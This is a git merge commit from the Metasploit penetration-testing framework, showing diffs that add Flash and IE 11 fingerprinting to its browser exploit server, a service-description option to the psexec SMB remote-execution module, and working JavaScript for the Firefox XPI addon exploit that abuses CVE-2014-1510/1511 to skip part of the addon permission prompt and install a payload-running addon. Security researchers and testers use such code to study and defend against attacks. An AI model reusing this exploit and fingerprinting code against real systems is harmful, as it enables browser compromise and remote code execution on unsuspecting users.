Merge branch 'upstream/master' into ext_server_kiwi

2014-04-03 07:19:36 +10:00 · 2014-04-03 07:19:36 +10:00 · e06ed601cf
parent 670a0c8e0f 74554ed805
commit e06ed601cf
8 changed files with 149 additions and 33 deletions
--- a/data/js/detect/misc_addons.js
+++ b/data/js/detect/misc_addons.js
@ -46,6 +46,53 @@ window.misc_addons_detect.hasSilverlight = function () {
 	return found;
 }

+/**
+ * Returns the Adobe Flash version
+**/
+window.misc_addons_detect.getFlashVersion = function () {
+	var foundVersion = null;
+
+	//
+	// Gets the Flash version by using the GetVariable function via ActiveX
+	//
+	try {
+		var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
+		foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
+	} catch (e) {}
+
+	//
+	// This should work fine for most non-IE browsers
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var pluginDesc = mimes[i].enabledPlugin.description.toString();
+			var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
+			if (m != null) {
+				foundVersion = m[0].match(/\d.+/g)[0];
+				break;
+			}
+		}
+	}
+
+	//
+	// Detection for Windows + Firefox
+	//
+	if (foundVersion == null) {
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
+
 /**
 * Returns the Java version
 **/
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@ -945,11 +945,18 @@ window.os_detect.getVersion = function(){
 		if (!ua_version) {
 			// The ScriptEngine functions failed us, try some object detection
 			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
-				// IE 10 detection using nodeName
+				// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
 				try {
-					var badNode = document.createElement && document.createElement("badname");
-					if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
-				} catch(e) {}
+					if (document.__proto__ != undefined) { ua_version = "11.0"; }
+				} catch (e) {}
+
+				// IE 10 detection using nodeName
+				if (!ua_version) {
+					try {
+						var badNode = document.createElement && document.createElement("badname");
+						if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
+					} catch(e) {}
+				}

 				// IE 9 detection based on a "Object doesn't support property or method" error
 				if (!ua_version) {
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@ -42,20 +42,21 @@ module Msf

    # Requirements a browser module can define in either BrowserRequirements or in targets
    REQUIREMENT_KEY_SET = {
-      :source       => 'source',      # Either 'script' or 'headers'
-      :ua_name      => 'ua_name',     # Example: MSIE
-      :ua_ver       => 'ua_ver',      # Example: 8.0, 9.0
-      :os_name      => 'os_name',     # Example: Microsoft Windows
-      :os_flavor    => 'os_flavor',   # Example: XP, 7
-      :language     => 'language',    # Example: en-us
-      :arch         => 'arch',        # Example: x86
-      :proxy        => 'proxy',       # 'true' or 'false'
-      :silverlight  => 'silverlight', # 'true' or 'false'
-      :office       => 'office',      # Example: "2007", "2010"
-      :java         => 'java',        # Example: 1.6, 1.6.0.0
-      :clsid        => 'clsid',       # ActiveX clsid. Also requires the :method key
-      :method       => 'method',      # ActiveX method. Also requires the :clsid key
-      :mshtml_build => 'mshtml_build'  # mshtml build. Example: "65535"
+      :source       => 'source',       # Either 'script' or 'headers'
+      :ua_name      => 'ua_name',      # Example: MSIE
+      :ua_ver       => 'ua_ver',       # Example: 8.0, 9.0
+      :os_name      => 'os_name',      # Example: Microsoft Windows
+      :os_flavor    => 'os_flavor',    # Example: XP, 7
+      :language     => 'language',     # Example: en-us
+      :arch         => 'arch',         # Example: x86
+      :proxy        => 'proxy',        # 'true' or 'false'
+      :silverlight  => 'silverlight',  # 'true' or 'false'
+      :office       => 'office',       # Example: "2007", "2010"
+      :java         => 'java',         # Example: 1.6, 1.6.0.0
+      :clsid        => 'clsid',        # ActiveX clsid. Also requires the :method key
+      :method       => 'method',       # ActiveX method. Also requires the :clsid key
+      :mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
+      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
    }

    def initialize(info={})
@ -222,9 +223,12 @@ module Msf
    # For more info about what the actual value might be for each key, see HttpServer.
    #
    # If the source is 'script', the profile might have even more information about plugins:
-    # 'office'  : The version of Microsoft Office (IE only)
-    # 'activex' : Whether a specific method is available from an ActiveX control (IE only)
-    # 'java'    : The Java version
+    # 'office'       : The version of Microsoft Office (IE only)
+    # 'activex'      : Whether a specific method is available from an ActiveX control (IE only)
+    # 'java'         : The Java version
+    # 'mshtml_build' : The MSHTML build version
+    # 'flash'        : The Flash version
+    # 'silverlight'  : The Silverlight version
    #
    # @param tag [String] Either a cookie or IP + User-Agent
    # @return [Hash] The profile found. If not found, returns nil
@ -375,7 +379,8 @@ module Msf
          "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"      : osInfo.ua_version,
          "<%=REQUIREMENT_KEY_SET[:arch]%>"        : osInfo.arch,
          "<%=REQUIREMENT_KEY_SET[:java]%>"        : window.misc_addons_detect.getJavaVersion(),
-          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight()
+          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight(),
+          "<%=REQUIREMENT_KEY_SET[:flash]%>"       : window.misc_addons_detect.getFlashVersion()
        };

        <% if  os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@ -52,7 +52,7 @@ module Exploit::Remote::SMB::Psexec
  # @param command [String] Should be a valid windows command
  # @param disconnect [Boolean] Disconnect afterwards
  # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true)
+  def psexec(command, disconnect=true, service_description=nil)
    simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
    handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
    vprint_status("#{peer} - Binding to #{handle} ...")
@ -72,6 +72,7 @@ module Exploit::Remote::SMB::Psexec
    end
    servicename = Rex::Text.rand_text_alpha(11)
    displayname = Rex::Text.rand_text_alpha(16)
+
    svc_handle = nil
    svc_status = nil
    stubdata =
@ -100,6 +101,22 @@ module Exploit::Remote::SMB::Psexec
      return false
    end

+    if service_description
+      vprint_status("#{peer} - Changing service description...")
+      stubdata =
+        svc_handle +
+        NDR.long(1) + # dwInfoLevel = SERVICE_CONFIG_DESCRIPTION
+        NDR.long(1) + # lpInfo -> *SERVICE_DESCRIPTION
+        NDR.long(0x0200) + # SERVICE_DESCRIPTION struct
+        NDR.long(0x04000200) +
+        NDR.wstring(service_description)
+      begin
+        response = dcerpc.call(0x25, stubdata) # ChangeServiceConfig2
+      rescue Rex::Proto::DCERPC::Exceptions::Fault => e
+        print_error("#{peer} - Error changing service description : #{e}")
+      end
+    end
+
    vprint_status("#{peer} - Starting the service...")
    stubdata = svc_handle + NDR.long(0) + NDR.long(0)
    begin
--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@ -75,7 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
-        :ua_ver  => /17\..*/
+        :ua_ver  => /17\..*/,
+        :flash   => /[\d.]+/
      }
    ))

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@ -28,13 +28,18 @@ class Metasploit3 < Msf::Exploit::Remote
        be "bootstrapped". As the addon will execute the payload after
        each Firefox restart, an option can be given to automatically
        uninstall the addon once the payload has been executed.
+
+        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
+        first half of the permissions prompt.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'mihi', 'joev' ],
      'References'    =>
        [
          [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
-          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
+          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
+          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
+          [ 'CVE', '2014-1511' ]
        ],
      'DisclosureDate' => 'Jun 27 2007'
    ))
@ -67,10 +72,42 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
-    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
-    html << %Q|</body></html>|
-    return html
+    %Q|
+      <html><head><title>Loading, Please Wait...</title></head>
+        <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
+        <div style='visibility:hidden;width:1px;height:1px;'>
+          <iframe name='f'></iframe>
+        </div>
+        <script>
+          function install() {
+            window.location.href="addon.xpi";
+          }
+          #{web_idl_navigation}
+        </script>
+        </body>
+      </html>
+    |
+  end
+
+  # In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
+  # From there you can load the browser XUL, and inject a data URL into a nested frame.
+  # If the data URL opens the .xpi URL, the first permission prompt gets skipped.
+  def web_idl_navigation
+    %Q|
+      try {
+        c = new mozRTCPeerConnection;
+        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
+        setTimeout(function(){
+          try {
+            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
+                                  "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
+          } catch(e) {
+            install();
+          }
+        },600);
+      } catch(e) {
+        install();
+      }
+    |
  end
 end
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -80,7 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
        OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
        OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
-        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil])
+        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
      ], self.class)
  end

@ -152,6 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
      simple.disconnect("ADMIN$")
    else
      servicename = rand_text_alpha(8)
+      servicedescription = datastore['SERVICE_DESCRIPTION']

      # Upload the shellcode to a file
      print_status("Uploading payload...")
@ -197,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote
        file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
      end

-      psexec(file_location, false)
+      psexec(file_location, false, servicedescription)

      print_status("Deleting \\#{filename}...")
      sleep(1)
--- a/spec/lib/rex/text_spec.rb
+++ b/spec/lib/rex/text_spec.rb
@ -118,7 +118,7 @@ describe Rex::Text do
      let (:sample_text) { "The quick brown sploit jumped over the lazy A/V" }
      let (:spaced_text) { described_class.randomize_space(sample_text) }
      it "should return a string with at least one new space characater" do
-        spaced_text.should match /\x09\x0d\x0a/
+        spaced_text.should match /[\x09\x0d\x0a]/
      end

      it "should not otherwise be mangled" do